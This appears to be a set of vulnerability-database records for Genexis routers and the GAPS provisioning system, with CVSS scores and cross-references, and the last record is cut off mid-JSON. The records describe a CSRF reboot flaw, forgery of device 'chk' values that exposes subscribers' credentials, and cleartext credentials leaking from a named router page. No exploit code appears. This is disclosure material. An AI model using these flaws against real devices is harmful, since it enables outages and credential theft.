Vulnerability from variot - Updated: 2023-12-18 13:46Cross site request forgery (CSRF) in Genexis Platinum 4410 V2-1.28, allows attackers to cause a denial of service by continuously restarting the router. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Service operation interruption (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202111-0723",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum 4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "p4410-v2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "genexis platinum-4410 firmware 2-1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:genexis:platinum_4410_firmware:p4410-v2-1.28:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:genexis:platinum_4410:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"cve": "CVE-2020-28137",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 7.1,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 6.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 7.1,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-28137",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 6.5,
"baseSeverity": "Medium",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2020-28137",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-28137",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202111-1009",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cross site request forgery (CSRF) in Genexis Platinum 4410 V2-1.28, allows attackers to cause a denial of service by continuously restarting the router. Genexis Platinum 4410 Contains a cross-site request forgery vulnerability.Service operation interruption (DoS) It may be in a state",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-28137"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-28137",
"trust": 3.2
},
{
"db": "EXPLOIT-DB",
"id": "48972",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-017478",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
]
},
"id": "VAR-202111-0723",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.44642857
},
"last_update_date": "2023-12-18T13:46:55.211000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top\u00a0Page",
"trust": 0.8,
"url": "https://www.gxgroup.eu/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.0
},
{
"problemtype": "Cross-site request forgery (CWE-352) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.exploit-db.com/exploits/48972"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-28137"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"db": "NVD",
"id": "CVE-2020-28137"
},
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-31T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"date": "2021-11-10T17:15:07.760000",
"db": "NVD",
"id": "CVE-2020-28137"
},
{
"date": "2021-11-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2022-10-31T05:01:00",
"db": "JVNDB",
"id": "JVNDB-2020-017478"
},
{
"date": "2021-11-13T03:58:04.713000",
"db": "NVD",
"id": "CVE-2020-28137"
},
{
"date": "2021-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis\u00a0Platinum\u00a04410\u00a0 Cross-site request forgery vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-017478"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202111-1009"
}
],
"trust": 0.6
}
}
VAR-201712-0667
Vulnerability from variot - Updated: 2023-12-18 13:43CPEs used by subscribers on the access network receive their individual configuration settings from a central GAPS instance. A CPE identifies itself by the MAC address of its WAN interface and a certain "chk" value (48bit) derived from the MAC. The algorithm used to compute the "chk" was disclosed by reverse engineering the CPE's firmware. As a result, it is possible to forge valid "chk" values for any given MAC address and therefore receive the configuration settings of other subscribers' CPEs. The configuration settings often contain sensitive values, for example credentials (username/password) for VoIP services. This issue affects Genexis B.V. GAPS up to 7.2. Genexis GAPS Contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GenexisAutomaticProvisioning System (GAPS) is a system of GENEXIS in the Netherlands for automatically configuring routers and networks. An access control vulnerability exists in GAPS 7.2 and earlier. An attacker could use this vulnerability to obtain configuration information (user credentials)
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201712-0667",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "gaps",
"scope": "lt",
"trust": 1.0,
"vendor": "genexis",
"version": "7.2"
},
{
"model": "gaps",
"scope": "lte",
"trust": 0.8,
"vendor": "genexis",
"version": "7.2"
},
{
"model": "automatic provisioning system",
"scope": "lte",
"trust": 0.6,
"vendor": "genexis",
"version": "\u003c=7.2"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01621"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"db": "NVD",
"id": "CVE-2017-6094"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:genexis:gaps:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "7.2",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6094"
}
]
},
"cve": "CVE-2017-6094",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 5.0,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2017-6094",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-01621",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2017-6094",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-6094",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-01621",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201702-690",
"trust": 0.6,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01621"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"db": "NVD",
"id": "CVE-2017-6094"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-690"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "CPEs used by subscribers on the access network receive their individual configuration settings from a central GAPS instance. A CPE identifies itself by the MAC address of its WAN interface and a certain \"chk\" value (48bit) derived from the MAC. The algorithm used to compute the \"chk\" was disclosed by reverse engineering the CPE\u0027s firmware. As a result, it is possible to forge valid \"chk\" values for any given MAC address and therefore receive the configuration settings of other subscribers\u0027 CPEs. The configuration settings often contain sensitive values, for example credentials (username/password) for VoIP services. This issue affects Genexis B.V. GAPS up to 7.2. Genexis GAPS Contains an information disclosure vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GenexisAutomaticProvisioning System (GAPS) is a system of GENEXIS in the Netherlands for automatically configuring routers and networks. An access control vulnerability exists in GAPS 7.2 and earlier. An attacker could use this vulnerability to obtain configuration information (user credentials)",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-6094"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"db": "CNVD",
"id": "CNVD-2018-01621"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-6094",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011783",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-01621",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201702-690",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01621"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"db": "NVD",
"id": "CVE-2017-6094"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-690"
}
]
},
"id": "VAR-201712-0667",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01621"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01621"
}
]
},
"last_update_date": "2023-12-18T13:43:52.609000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "GAPS",
"trust": 0.8,
"url": "https://genexis.eu/product/gaps/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"db": "NVD",
"id": "CVE-2017-6094"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://seclists.org/fulldisclosure/2017/dec/62"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-6094"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-6094"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-01621"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"db": "NVD",
"id": "CVE-2017-6094"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-690"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-01621"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"db": "NVD",
"id": "CVE-2017-6094"
},
{
"db": "CNNVD",
"id": "CNNVD-201702-690"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01621"
},
{
"date": "2018-01-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"date": "2017-12-20T20:29:00.573000",
"db": "NVD",
"id": "CVE-2017-6094"
},
{
"date": "2017-02-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-690"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-01-22T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-01621"
},
{
"date": "2018-01-26T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-011783"
},
{
"date": "2018-01-11T15:10:05.010000",
"db": "NVD",
"id": "CVE-2017-6094"
},
{
"date": "2017-12-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201702-690"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-690"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Genexis GAPS Vulnerable to information disclosure",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-011783"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201702-690"
}
],
"trust": 0.6
}
}
VAR-202001-1817
Vulnerability from variot - Updated: 2023-12-18 13:37An authentication bypass vulnerability on Genexis Platinum-4410 v2.1 P4410-V2 1.28 devices allows attackers to obtain cleartext credentials from the HTML source code of the cgi-bin/index2.asp URI. Genexis Platinum-4410 The device contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Genexis Platinum-4410 is a WiFi 300/750 Mbps three-network integrated GPON ONT series router.
Genexis Platinum-4410 2.1 P4410-V2 1.28 has an authentication bypass vulnerability
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1817",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "platinum-4410",
"scope": "eq",
"trust": 1.0,
"vendor": "genexis",
"version": "1.28"
},
{
"model": "platinum-4410",
"scope": "eq",
"trust": 0.8,
"vendor": "genexis",
"version": "2 1.28"
},
{
"model": "platinum-4410 p4410-v2",
"scope": "eq",
"trust": 0.6,
"vendor": "genexis",
"version": "2.11.28"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-14704"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-001334"
},
{
"db": "NVD",
"id": "CVE-2020-6170"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
